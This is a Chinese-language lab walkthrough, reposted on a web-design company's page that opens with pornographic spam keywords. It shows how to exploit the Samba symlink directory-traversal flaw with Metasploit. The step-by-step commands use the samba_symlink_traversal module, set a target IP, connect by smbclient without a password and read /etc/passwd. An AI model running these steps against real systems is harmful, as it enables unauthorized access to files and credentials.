真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

Metasploit溢出samba提權(quán)漏洞

    Samba是一套實(shí)現(xiàn)SMB(server messages block)協(xié)議,跨平臺(tái)進(jìn)行文件共享和打印共享服務(wù)的程序,samba的sambd默認(rèn)配置在可寫文件共享時(shí),存在目錄遍歷漏洞,遠(yuǎn)程用戶可以通過smbclient端使用一個(gè)對稱命,創(chuàng)建一個(gè)包含..的目錄遍歷符的軟連接 ,可以進(jìn)行目錄遍歷以及訪問任意文件。

目前創(chuàng)新互聯(lián)公司已為上千多家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)絡(luò)空間、網(wǎng)站托管維護(hù)、企業(yè)網(wǎng)站設(shè)計(jì)、荷塘網(wǎng)站維護(hù)等服務(wù),公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。

 

一、利用nmap工具掃描目標(biāo)主機(jī)

1.1使用nmap命令對目標(biāo)主機(jī)進(jìn)行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。

Metasploit溢出samba提權(quán)漏洞

1.3在終端中輸入命令“msfconsole”,啟動(dòng)MSF終端。

1.4在終端中輸入命令“search samba”,搜索samba的相關(guān)工具和***載荷。

1.5在終端中輸入命令“use auxiliary/admin/smb/samba_symlink_traversal”,啟用漏洞利用模塊, 提示符就會(huì)提示進(jìn)入到該路徑下。

Metasploit溢出samba提權(quán)漏洞

1.6在終端中輸入命令“info”,查看需要設(shè)置的相關(guān)項(xiàng),“yes”表示必須填寫的參數(shù)。

Metasploit溢出samba提權(quán)漏洞

1.7在終端中輸入命令“set RHOST 192.168.1.3”,設(shè)置目標(biāo)主機(jī)的IP地址。

1.8在終端中輸入“set SMBSHARE tmp”, 設(shè)置SAM可寫文件。

1.9在終端中輸入“exploit”, 開始***。

1.10新打開一個(gè)終端,輸入“smbclient //192.168.1.3/tmp”,直接回車,不用輸入密碼。

Metasploit溢出samba提權(quán)漏洞

1.11在終端中輸入“cd rootfs”, 進(jìn)入rootfs目錄,在終端下輸入命令“l(fā)s”,列出目錄。

1.12在終端中輸入“more /etc/passwd”, 查看目標(biāo)主機(jī)系統(tǒng)中的密碼。

Metasploit溢出samba提權(quán)漏洞

Metasploit溢出samba提權(quán)漏洞


新聞名稱:Metasploit溢出samba提權(quán)漏洞
文章URL:http://weahome.cn/article/jgcpjc.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部